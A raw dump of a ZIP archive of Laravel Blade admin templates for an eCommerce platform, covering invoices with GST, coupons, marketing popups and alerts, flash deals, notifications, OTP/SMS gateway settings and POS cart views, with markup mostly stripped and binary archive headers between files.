    {{ translate('Qty') }}: {{ $orderDetail->quantity }} {{ translate('Price') }}: {{ single_price($orderDetail->price) }}
    @php $gst_amount = get_gst_by_price_and_rate($orderDetail->price - $orderDetail->coupon_discount , $orderDetail->gst_rate); $shipping_gst = get_gst_by_price_and_rate($orderDetail->shipping_cost, $orderDetail->gst_rate); @endphp @if(same_state_shipping($order)) @else @endif
    {{ translate('Gross Amt') }}: {{ single_price($orderDetail->price) }}
    {{ translate('Discount') }}: {{ single_price($orderDetail->coupon_discount) }}
    {{ translate('Taxable Value') }}: {{ single_price($orderDetail->price - $orderDetail->coupon_discount) }}
    {{ translate('CGST') }} ({{ $orderDetail->gst_rate/2 }}%): {{ single_price($gst_amount/2) }}
    {{ translate('SGST') }} ({{ $orderDetail->gst_rate/2 }}%): {{ single_price($gst_amount/2) }}
    {{ translate('IGST') }} ({{ $orderDetail->gst_rate }}%): {{ single_price($gst_amount) }}
    @if(same_state_shipping($order)) @else @endif
    {{ translate('Shipping Details') }}
    {{ translate('Cost') }}: {{ single_price($orderDetail->shipping_cost) }}
    {{ translate('CGST') }}: {{ single_price($shipping_gst/2) }}
    {{ translate('SGST') }}: {{ single_price($shipping_gst/2) }}
    {{ translate('IGST') }}: {{ single_price($shipping_gst) }}
    {{ translate('Item Total') }}: {{ single_price($orderDetail->price - $orderDetail->coupon_discount + $gst_amount + $orderDetail->shipping_cost + $shipping_gst) }}
    {{ translate('Tax') }}: {{ single_price($orderDetail->tax) }}
    {{ translate('Item Total') }}: {{ single_price($orderDetail->price + $orderDetail->tax) }}
    @endif @endforeach
    {{ translate('ORDER SUMMARY') }}
    @if(is_numeric($first_order->gst_amount)) @else @if($order->coupon_discount > 0) @endif @endif
    {{ translate('Sub Total (Taxable)') }}: {{ single_price($order->orderDetails->sum('price') + $order->orderDetails->sum('shipping_cost') - $order->orderDetails->sum('coupon_discount')) }}
    {{ translate('Total GST') }}: {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Sub Total') }}: {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Shipping') }}: {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('Tax') }}: {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Coupon Discount') }}: -{{ single_price($order->coupon_discount) }}
    {{ translate('GRAND TOTAL') }} {{ single_price($order->grand_total) }}
    {{ translate('Thank you for your purchase!') }}
    PK�N]�=TW,W,#views/backend/layouts/app.blade.phpnu�[��� @if (\App\Models\Language::where('code', Session::get('locale', Config::get('app.locale')))->first()->rtl == 1) @else @endif {{ get_setting('website_name') . ' | ' . get_setting('site_motto') }} {{-- --}} @if (\App\Models\Language::where('code', Session::get('locale', Config::get('app.locale')))->first()->rtl == 1) @endif
    @include('backend.inc.admin_sidenav')
    @include('backend.inc.admin_nav')
    @yield('content')

    © {{ get_setting('site_name') }} v{{ get_setting('current_version') }}

    @include('modals.bulk_action_modal') @yield('modal') @yield('script') PK�N]������%views/backend/layouts/blank.blade.phpnu�[��� {{ config('app.name', 'eCommerce') }} {{-- --}}
    @yield('content')
    @yield('script') PK�N]�6N@e e &views/backend/layouts/layout.blade.phpnu�[��� @if(\App\Models\Language::where('code', Session::get('locale', Config::get('app.locale')))->first()->rtl == 1) @else @endif {{ get_setting('website_name').' | '.get_setting('site_motto') }} @if(\App\Models\Language::where('code', Session::get('locale', Config::get('app.locale')))->first()->rtl == 1) @endif
    @yield('content')
    @yield('modal') @yield('script') PK�N]x�=�)�)0views/backend/marketing/coupons/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Coupon Information Adding')}}
    @csrf @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @endsection @section('modal') @include('modals.loading_modal')
    {{ translate('Select Products') }}
    @endsection @section('script') @endsectionPK�N]d/o��*�*.views/backend/marketing/coupons/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Coupon Information Update')}}

    @csrf
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @endsection @section('modal') @include('modals.loading_modal') {{-- Right Offcanvas --}}
    {{ translate('Select Products') }}
    @endsection @section('script') @endsectionPK�N]�T�m�7�7/views/backend/marketing/coupons/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('All Coupons') }}

    @can('add_coupon') {{ translate('Add New Coupon') }} @endcan
    @endsection @section('script') @endsectionPK�N]�//=views/backend/marketing/coupons/coupon_product_list.blade.phpnu�[���@if($products->count() > 0) @foreach($products as $product) @endforeach
    {{ translate('Product') }} {{ translate('Price') }}
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @else

    {{ translate('No products found.') }}

    @endifPK�N]� �(;(;(/views/backend/marketing/coupons/table.blade.phpnu�[���
    @if (auth()->user()->can('delete_coupon')) @else @endif @canany(['edit_coupon','delete_coupon']) @endcanany @forelse ($coupons as $key => $coupon) @php $isProtected = ($coupon->type == 'welcome_base' && $coupon->status == 1); @endphp @canany(['edit_coupon','delete_coupon']) @endcanany @empty @endforelse
    # {{ translate('Code') }} {{ translate('Type') }} {{ translate('Start Date') }} {{ translate('End Date') }} {{ translate('Validation Days') }} {{ translate('Status') }} {{ translate('Options') }}
    @if (auth()->user()->can('delete_coupon'))
    @else
    {{ $key + 1 + ($coupons->currentPage() - 1) * $coupons->perPage() }}
    @endif
    {{$coupon->code}}
    {{ translate(Str::headline($coupon->type)) }}
    {{ $coupon->type != 'welcome_base' ? date('d-m-Y', $coupon->start_date) : '' }}
    {{ $coupon->type != 'welcome_base' ? date('d-m-Y', $coupon->end_date) : '' }}
    @if($coupon->type == 'welcome_base') {{ json_decode($coupon->details)->validation_days }} @endif
    @if($coupon->type == 'welcome_base') @endif
    {{ translate('No Data found!') }}
    {{ $coupons->appends(request()->input())->links() }}
    PK�N]]1���0�05views/backend/marketing/custom_alert/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Add New Custom Alerts') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{ translate('Custom Alert Information') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    custom alert small custom alert large
    @endsection @section('script') @endsection PK�N]`a��6�63views/backend/marketing/custom_alert/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Custom Alerts') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf @method('PUT')
    {{ translate('Custom Alert Information') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @if ($custom_alert->id == 1 || $custom_alert->id == 200) @else @endif
    text_color == 'white') checked @endif>
    text_color == 'dark') checked @endif>
    {{-- need to ad a select option 3,5,8,10 sec for alert auto hideing --}} @if($custom_alert->id != 1 && $custom_alert->id != 200)
    @endif
    custom alert small custom alert large
    @endsection @section('script') @endsection PK�N]�-҅�U�U4views/backend/marketing/custom_alert/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Custom Alerts')}}

    @can('add_custom_alerts') @endcan

    {{translate('Select Alert Location')}}

    {{translate('Select any alert location from following')}}


    {{ translate('From Bottom-left') }}

    {{ translate('From Bottom-right') }}

    {{ translate('From Top-left') }}

    {{ translate('From Top-right') }}
    {{translate('All Custom Alerts')}}
    @can('delete_custom_alerts') @endcan
    @can('delete_custom_alerts') @endcan @foreach($custom_alerts as $key => $custom_alert) @php if ($custom_alert->id == 200 && !addon_is_activated('club_point')) { continue; }elseif($custom_alert->id == 300 && !addon_is_activated('otp_system')){ continue; } @endphp @can('delete_custom_alerts') @endcan @endforeach
    {{translate('Image')}} {{translate('Text')}} {{translate('Link')}} {{translate('Type')}} {{translate('Trigger')}} {{translate('Actions')}}
    {{translate('Product Title')}} - {{translate('ordered just now')}} ({{translate('Custom sale alert')}}) # {{ translate('default') }}
    @if($custom_alert->id != 1 && $custom_alert->id != 200 && $custom_alert->id != 300)
    @else @endif
    {!! $custom_alert->description !!} {{ $custom_alert->link }} @if($custom_alert->id != 1 && $custom_alert->id != 200 && $custom_alert->id != 300) @if($custom_alert->type == 'small') {{ translate('Small') }} @else {{ translate('Large') }} @endif @else {{ translate('default') }} @endif
    {{ $custom_alerts->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsectionPK�N]*]�� � 9views/backend/marketing/custom_product_visitors.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Custom Product Visitiors')}}
    @csrf
    {{ translate('to') }}
    @endsection @section('script') @endsectionPK�N]������8views/backend/marketing/custom_sale_alert/edit.blade.phpnu�[���@if(count($product_ids) > 0) @foreach ($product_ids as $key => $id) @php $product = \App\Models\Product::findOrFail($id); $sale_alert_product = \App\Models\CustomSaleAlert::where('product_id', $product->id)->first(); @endphp @endforeach
    {{translate('Product')}} {{translate('Base Price')}} {{translate('Added By')}}
    {{ $product->getTranslation('name') }}
    {{ $product->unit_price }} {{ optional($product->user)->name }}
    @endifPK�N]�(�'��9views/backend/marketing/custom_sale_alert/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Custom Sale Alert Products')}}
    @csrf
    {{ translate('To') }}
    @endsection @section('script') @endsectionPK�N]��! �"�"6views/backend/marketing/dynamic_popup/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Add New Dynamic Popup') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{ translate('Custom Dynamic Popup Information') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    Dynamic Popup
    @endsection @section('script') @endsection PK�N]� ��l'l'4views/backend/marketing/dynamic_popup/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Dynamic Popup') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf @method('PUT')
    {{ translate('Custom Dynamic Popup Information') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    btn_text_color == 'white') checked @endif>
    btn_text_color == 'dark') checked @endif>
    @if($dynamic_popup->id != 1)
    @endif @if($dynamic_popup->id == 1)
    @endif
    Dynamic Popup
    @endsection PK�N]�d㐄5�55views/backend/marketing/dynamic_popup/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Dynamic Popups')}}

    @can('add_dynamic_popups') @endcan
    {{translate('All Dynamic Popups')}}
    @can('delete_dynamic_popups') @endcan
    @can('delete_dynamic_popups') @endcan @foreach($dynamic_popups as $dynamic_popup) @can('delete_dynamic_popups') @endcan @endforeach
    {{translate('Image')}} {{translate('Title')}} {{translate('Link')}} {{translate('Status')}} {{translate('Actions')}}
    @if($dynamic_popup->id != 1 && $dynamic_popup->id != 100)
    @else @endif
    {{ $dynamic_popup->title }} {{ $dynamic_popup->btn_link }}
    {{ $dynamic_popups->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsection PK�N]�b #B=B=4views/backend/marketing/flash_deals/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Flash Deal Information')}}
    @csrf
    generate Icon
    {{ translate('This image is shown as cover banner in flash deal details page. Minimum dimensions required: 436px width X 443px height.') }}
    {{ translate('Any product with a discount or included in another flash deal will not be displayed here.') }}

    @endsection @section('modal') @include('modals.loading_modal')
    {{ translate('Select Products') }}
    @endsection @section('script') @endsectionPK�N]�‹�H�H2views/backend/marketing/flash_deals/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    @csrf
    @php $start_date = date('d-m-Y H:i:s', $flash_deal->start_date); $end_date = date('d-m-Y H:i:s', $flash_deal->end_date); @endphp
    banner
    {{ translate('This image is shown as cover banner in flash deal details page. Minimum dimensions required: 436px width X 443px height.') }}
    {{ translate('Any product with a discount or included in another flash deal will not be displayed here.') }}

    @endsection @section('modal') @include('modals.loading_modal')
    {{ translate('Select Products') }}
    @endsection @section('script') @endsectionPK�N]���I..Aviews/backend/marketing/flash_deals/flash_deal_discount.blade.phpnu�[���@if(count($product_ids) > 0) @foreach ($product_ids as $key => $id) @php $product = \App\Models\Product::where('promotional', 1)->findOrFail($id); @endphp @endforeach
    {{ translate('Product') }} {{ translate('Base Price') }} {{ translate('Discount') }} {{ translate('Action') }}
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @endifPK�N]8��PPFviews/backend/marketing/flash_deals/flash_deal_discount_edit.blade.phpnu�[���@if(count($product_ids) > 0) @foreach ($product_ids as $key => $id) @php $product = \App\Models\Product::where('promotional', 1)->findOrFail($id); @endphp @endforeach
    {{ translate('Product') }} {{ translate('Base Price') }} {{ translate('Discount') }} {{ translate('Action') }}
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @endifPK�N]����X4X43views/backend/marketing/flash_deals/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('All Flash Deals') }}

    @can('add_flash_deal') {{ translate('Add New Flash Deal') }} @endcan
    @endsection @section('script') @endsectionPK�N]La����Eviews/backend/marketing/flash_deals/flash_deal_product_list.blade.phpnu�[���@if($products->count() > 0) @foreach($products as $product) @endforeach
    {{ translate('Product') }} {{ translate('Price') }}
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @else

    {{ translate('No products found.') }}

    @endifPK�N]�"+"+3views/backend/marketing/flash_deals/table.blade.phpnu�[���
    @if (auth()->user()->can('delete_flash_deal')) @else @endif @canany(['edit_flash_deal','delete_flash_deal']) @endcanany @forelse ($flash_deals as $key => $flash_deal) @canany(['edit_flash_deal','delete_flash_deal']) @endcanany @empty @endforelse
    # {{ translate('Banner') }} {{ translate('Title') }} {{ translate('Start Date') }} {{ translate('End Date') }} {{ translate('Status') }} {{ translate('Featured') }} {{ translate('Options') }}
    @if (auth()->user()->can('delete_flash_deal'))
    @else
    {{ $key + 1 + ($flash_deals->currentPage() - 1) * $flash_deals->perPage() }}
    @endif
    banner
    {{ $flash_deal->getTranslation('title') }}
    {{ date('d-m-Y H:i:s', $flash_deal->start_date) }}
    {{ date('d-m-Y H:i:s', $flash_deal->end_date) }}
    {{ translate('No Data found!') }}
    {{ $flash_deals->appends(request()->input())->links() }}
    PK�N]a�Y8 8 3views/backend/marketing/newsletters/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Send Newsletter')}}
    @csrf
    @endsection PK�N]L���VV3views/backend/marketing/subscribers/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('All Subscribers')}}
    @foreach($subscribers as $key => $subscriber) @endforeach
    # {{translate('Email')}} {{translate('Date')}} {{translate('Options')}}
    {{ ($key+1) + ($subscribers->currentPage() - 1)*$subscribers->perPage() }}
    {{ $subscriber->email }}
    {{ date('d-m-Y', strtotime($subscriber->created_at)) }} @can('delete_subscriber') @endcan
    {{ $subscribers->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]�okk�0�0+views/backend/marketing/dashboard.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Marketing') }}

    {{ translate('Manage marketing needs for your site') }}
    @can('view_all_dynamic_popups') @endcan @can('view_all_custom_alerts') @endcan @if (addon_is_activated('otp_system') && auth()->user()->can('send_bulk_sms')) @endif @can('notification_settings') @endcan @can('manage_email_templates') @endcan @can('send_newsletter') @endcan @can('view_blogs') @endcan @can('view_custom_sale_alert') @endcan @can('custom_visitors_setup') @endcan @can('view_all_subscribers') @endcan
    @endsection PK�N]�?�[ [ #views/backend/note/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Note Information') }}
    @csrf
    @error('description') {{ $message }} @enderror
    @endsection PK�N]��� � !views/backend/note/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Note Information') }}
    @csrf
    @error('description') {{ $message }} @enderror
    @endsection PK�N]� ���&views/backend/note/get_notes.blade.phpnu�[��� PK�N]S ���$�$"views/backend/note/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('All Notes') }}

    @can('add_note') @endcan
    @php $activeClasss = 'btn-soft-blue'; $inActiveClasses = 'text-secondary border-dashed border-soft-light'; @endphp {{ translate('All') }} {{ translate('In-House') }} {{ translate('Seller') }}
    @foreach ($notes as $key => $note) @endforeach
    # {{ translate('User') }} {{ translate('Type') }} {{ translate('Description') }} {{ translate('Seller Can Access') }}? {{ translate('Options') }}
    {{ $key + 1 + ($notes->currentPage() - 1) * $notes->perPage() }} {{ $note->user_id == get_admin()->id ? translate('In-House') : ($note->user->shop->name ?? $note->user->name) }} {{ translate($note->note_type) }}

    {{ $note->getTranslation('description') }}

    @if( $note->user_id == get_admin()->id) @endif @can('edit_note') @endcan @can('delete_note') @endcan
    {{ $notes->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]N �A%%8views/backend/notification/custom_notification.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    @csrf

    {{ translate('Send Custom Notification') }}

    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @endsection @section('script') @endsection PK�N]o7T��@views/backend/notification/custom_notification_history.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Custom Notification History') }}

    {{ translate('Default system notifications doesn’t show in custom notification history') }}
    @can('delete_custom_notification_history') @endcan
    @foreach ($customNotifications as $key => $customNotification) @endforeach
    {{ translate('Type') }} {{ translate('Date & Time ') }} {{ translate('Notification') }} {{ translate('Link') }} {{ translate('Actions') }}
    {{ get_notification_type($customNotification->notification_type_id, 'id')->getTranslation('name') }} {{ date('d.m.Y, g.i a', strtotime($customNotification->created_at)) }} {{ get_notification_type($customNotification->notification_type_id, 'id')->getTranslation('default_text') ?? null }} {{ json_decode($customNotification->data, true)['link'] }} @can('delete_custom_notification_history') @endcan
    {{ $customNotifications->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsection PK�N]3L"..Cviews/backend/notification/custom_notified_customers_list.blade.phpnu�[��� PK�N]��.�� � *views/backend/notification/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('All Notifications') }}

    {{ translate('Notifications') }}
    {{ $notifications->links() }}
    @endsection @section('script') @endsection PK�N]f[���<views/backend/notification/notification_types/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Notification Type Information') }}
    @csrf @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @if ($notificationType->type != 'custom') {{ translate('N.B : Do Not Change The Variables Like') }} [[ ____ ]] @endif {{ translate('N.B : Use character, number only') }}
    @endsection PK�N]41�

    {{ translate('All Notification Types') }}

    {{-- Notification Type List --}}

    {{ translate('All Notification Types') }}

    {{ translate('Default notification types can not be deleted.') }}
    @php $activeClasss = 'btn-soft-blue'; $inActiveClasses = 'text-secondary border-dashed border-soft-light'; @endphp {{ translate('Customer') }} {{ translate('Seller') }} {{ translate('Admin') }}
    @can('delete_notification_types') @endcan
    @foreach ($notificationTypes as $key => $notificationType) @endforeach
    {{ translate('Image') }} {{ translate('Type') }} {{ translate('DEfault Text') }} {{ translate('Status') }} {{ translate('Actions') }}
    @if ($notificationType->type != 'custom') @else
    @endif
    {{ translate('Image') }} {{ $notificationType->getTranslation('name') }} {{ $notificationType->getTranslation('default_text') }} @can('edit_notification_types') @endcan @if(auth()->user()->can('delete_notification_types') && $notificationType->type == 'custom') @endif
    {{ $notificationTypes->appends(request()->input())->links() }}
    {{-- Notification Type Add --}} @can('add_notification_types')
    {{ translate('Add New Notification Type') }}
    @csrf @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    ** {{ translate('N.B : Use character, number only') }} **
    @endcan
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsection PK�N]}Х3KK-views/backend/notification/settings.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    @csrf @php $notification_show_type = get_setting('notification_show_type'); @endphp

    {{translate('Notification Settings')}}

    {{ translate('You can add new types & upload image for every type. If you do not upload image or edit images from default types then default image will be shown.') }}

    {{ translate('Order code') }} : 20220912-10085522 {{ translate('has been Delivered') }}

    {{ translate('Order code') }} : 20220912-10085522 {{ translate('has been Delivered') }}
    {{ translate('Order code') }} : 20220912-10085522 {{ translate('has been Delivered') }}
    {{ translate('Order code') }} : 20220912-10085522 {{ translate('has been Delivered') }}
    @endsection PK�N]9,�� � 8views/backend/otp_systems/configurations/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    @foreach ($otp_configurations as $otp_configuration)
    {{ ucfirst(translate($otp_configuration->type)) }}
    @csrf @include('backend.otp_systems.configurations.partials.'.$otp_configuration->type)
    @endforeach
    @endsection @section('script') @endsection PK�N]�7����Fviews/backend/otp_systems/configurations/login_configuration.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Login With OTP') }}

    @endsection @section('script') @endsection PK�N]�U�� � Dviews/backend/otp_systems/configurations/partials/fast2sms.blade.phpnu�[���
    PK�N]��Yvv@views/backend/otp_systems/configurations/partials/mimo.blade.phpnu�[���
    PK�N]ǫ����Bviews/backend/otp_systems/configurations/partials/mimsms.blade.phpnu�[���
    PK�N]1��Bviews/backend/otp_systems/configurations/partials/msegat.blade.phpnu�[���
    PK�N]) ��mmAviews/backend/otp_systems/configurations/partials/nexmo.blade.phpnu�[���
    {{translate('Please check this URL for')}} Sender Identity {{translate('before setting the sender ID')}}
    PK�N]?C��Cviews/backend/otp_systems/configurations/partials/sparrow.blade.phpnu�[���
    PK�N]� �`hhHviews/backend/otp_systems/configurations/partials/ssl_wireless.blade.phpnu�[���
    PK�N]z����Bviews/backend/otp_systems/configurations/partials/twillo.blade.phpnu�[���
    PK�N]=���PPBviews/backend/otp_systems/configurations/partials/zender.blade.phpnu�[���
    The site url of your Zender. Do not add ending slash.
    Your Zender API key. Please make sure that it is correct and required permissions are granted: sms_send, wa_send
    Select the sending service. Please make sure that the API key has the following permissions: sms_send, wa_send
    For WhatsApp service only. WhatsApp account ID you want to use for sending.
    For SMS service only. Linked device unique ID. Please only enter this field if you are sending using one of your devices.
    For SMS service only. Partner device unique ID or gateway ID. Please only enter this field if you are sending using a partner device or third party gateway.
    For SMS service only. Select the sim slot you want to use for sending the messages. Please only enter this field if you are sending using your device. This is ignored for partner devices and third party gateways.
    PK�N]��p�;;@views/backend/otp_systems/configurations/sms_templates.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('SMS Templates')}}
    @php $mustSendSmsTemplates = ['phone_number_verification', 'password_reset', 'account_opening', ]; @endphp @foreach ($sms_templates as $key => $sms_template)
    @csrf @if(!in_array($sms_template->identifier, $mustSendSmsTemplates))
    @endif
    {{ ('**N.B : Do Not Change The Variables Like [[ ____ ]].**') }} @error('body') {{ $message }} @enderror
    {{ ('**N.B : Template ID is Required Only for Fast2SMS DLT Manual**') }}
    @endforeach
    @endsection PK�N]�ν�\ \ -views/backend/otp_systems/sms/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Send Bulk SMS')}}

    @csrf
    {{ ('**N.B : Template ID is Required Only for Fast2SMS DLT Manual **') }}
    @endsection PK�N]r!_5�� views/backend/pos/cart.blade.phpnu�[���
    @php $subtotal = 0; $tax = 0; $gst= 0; $carts = get_pos_user_cart(); @endphp @if (count($carts) > 0)
      @forelse ($carts as $key => $cartItem) @php $product = $cartItem->product; $stock = $cartItem->product->stocks->where('variant', $cartItem['variation'])->first(); $subtotal += cart_product_price($cartItem, $product, false, false) * $cartItem['quantity']; $tax += cart_product_tax($cartItem, $product, false) * $cartItem['quantity']; if (addon_is_activated('gst_system')) { $cartCount = count($carts); $session_discount = Session::get('pos.discount', 0); $session_shipping = Session::get('pos.shipping', 0); $gst += pos_cart_product_gst($cartItem, $product, $session_discount/$cartCount, $session_shipping/$cartCount , false); } $cartID = $cartItem['id']; @endphp
    • {{ $product->name }}
      {{ $cartItem['variant'] }}
      {{ single_price($cartItem['price']) }} x {{ $cartItem['quantity'] }}
      {{ single_price($cartItem['price']*$cartItem['quantity']) }}
    • @empty
    • {{ translate('No Product Added') }}

    • @endforelse
    @else

    {{ translate('No Product Added') }}

    @endif
    {{translate('Sub Total')}} {{ single_price($subtotal) }}
    @if(!addon_is_activated('gst_system'))
    {{translate('Tax')}} {{ single_price($tax) }}
    @endif
    {{translate('Shipping')}} {{ single_price(Session::get('pos.shipping', 0)) }}
    {{translate('Discount')}} {{ single_price(Session::get('pos.discount', 0)) }}
    @if(addon_is_activated('gst_system'))
    {{translate('GST')}} {{ single_price($gst) }}
    @endif
    {{translate('Total')}} {{ single_price($subtotal+$tax+$gst+Session::get('pos.shipping', 0) - Session::get('pos.discount', 0)) }}
    PK�N]��.�^^$views/backend/pos/products.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('POS products') }}

    @if (auth()->user()->can('add_pos_products')) {{ translate('Import Products') }} @endif
    @if($seller_type == 'seller')
    @endif
    @endsection @section('modal') @include('modals.loading_modal')
    @include('offcanvas.products_select_right_canvas')
    @endsection @section('script') @endsection PK�N]��9 9 2views/backend/pos/guest_shipping_address.blade.phpnu�[���
    PK�N]a�����!views/backend/pos/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Loading..') }}
    @php $userID = Session::has('pos.user_id') ? Session::get('pos.user_id') : null; @endphp
    {{--
    --}}
    @csrf
    @if(addon_is_activated('gst_system')) @endif
    @php $subtotal = 0; $tax = 0; $carts = get_pos_user_cart(); $gst= 0; @endphp @if (count($carts) > 0)
      @forelse ($carts as $key => $cartItem) @php $product = $cartItem->product; $stock = $cartItem->product->stocks->where('variant', $cartItem['variation'])->first(); $subtotal += cart_product_price($cartItem, $product, false, false) * $cartItem['quantity']; $tax += cart_product_tax($cartItem, $product, false) * $cartItem['quantity']; if (addon_is_activated('gst_system')) { $cartCount = count($carts); $session_discount = Session::get('pos.discount', 0); $session_shipping = Session::get('pos.shipping', 0); $gst += pos_cart_product_gst($cartItem, $product, $session_discount/$cartCount, $session_shipping/$cartCount , false); } $cartID = $cartItem['id']; @endphp
    • {{ $product->name }}
      {{ $cartItem['variant'] }}
      {{ single_price($cartItem['price']) }} x {{ $cartItem['quantity'] }}
      {{ single_price($cartItem['price']*$cartItem['quantity']) }}
    • @empty
    • {{ translate('No Product Added') }}

    • @endforelse
    @else

    {{ translate('No Product Added') }}

    @endif
    {{translate('Sub Total')}} {{ single_price($subtotal) }}
    @if(!addon_is_activated('gst_system'))
    {{translate('Tax')}} {{ single_price($tax) }}
    @endif
    {{translate('Shipping')}} {{ single_price(Session::get('pos.shipping', 0)) }}
    {{translate('Discount')}} {{ single_price(Session::get('pos.discount', 0)) }}
    @if(addon_is_activated('gst_system'))
    {{translate('GST')}} {{ single_price($gst) }}
    @endif
    {{ translate('Total') }} {{ single_price($subtotal+$tax+$gst+Session::get('pos.shipping', 0) - Session::get('pos.discount', 0)) }}
    @endsection @section('modal') {{-- Change Customer Confirmation Modal--}} {{-- Offline Payment Modal --}}
    @include('offcanvas.products_select_right_canvas')
    @include('modals.loading_modal') @endsection @section('script') @endsectionPK�N]��]> > *views/backend/pos/pos_activation.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('POS Activation for Seller')}}

    {{translate('POS Activation for Seller')}}
    {{ translate('Thermal Printer Size') }}
    @csrf
    {{ translate('mm') }}
    @endsection @section('script') @endsection PK�N]G��P  ,views/backend/pos/shipping_address.blade.phpnu�[���
    @foreach (\App\Models\Address::where('user_id',$user_id)->get() as $key => $address) @endforeach
    {{ translate('Add New Address') }}
    PK�N]O ' __$views/backend/pos/variants.blade.phpnu�[��� PK�N]�i�
    @php $subtotal = 0; $tax = 0; $gst= 0; $carts = get_pos_user_cart(); $total = 0; @endphp @if (count($carts) > 0)
      @forelse ($carts as $key => $cartItem) @php $subtotal += $cartItem['price']*$cartItem['quantity']; $tax += $cartItem['tax']*$cartItem['quantity']; if (addon_is_activated('gst_system')) { $cartCount = count($carts); $session_discount = Session::get('pos.discount', 0); $session_shipping = Session::get('pos.shipping', 0); $gst += pos_cart_product_gst($cartItem, $cartItem->product, $session_discount/$cartCount, $session_shipping/$cartCount , false); } $stock = $cartItem->product->stocks->where('variant', $cartItem['variation'])->first(); $total = $subtotal+$tax+$gst+Session::get('pos.shipping', 0) - Session::get('pos.discount', 0); @endphp
    • @if($stock->image == null) @else @endif
      {{ $stock->product->name }}
      {{ $cartItem['variant'] }}
      {{ single_price($cartItem['price']) }}
      {{ translate('QTY') }}: {{ $cartItem['quantity'] }}
    • @empty
    • {{ translate('No Product Added') }}

    • @endforelse
    @else

    {{ translate('No Product Added') }}

    @endif
    {{ translate('Customer Info') }}
